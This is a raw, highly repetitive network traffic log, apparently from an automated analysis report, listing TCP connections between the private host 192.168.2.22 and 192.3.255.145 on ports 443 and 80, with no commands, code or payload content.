Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.3.255.145:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.3.255.145:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.3.255.145:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
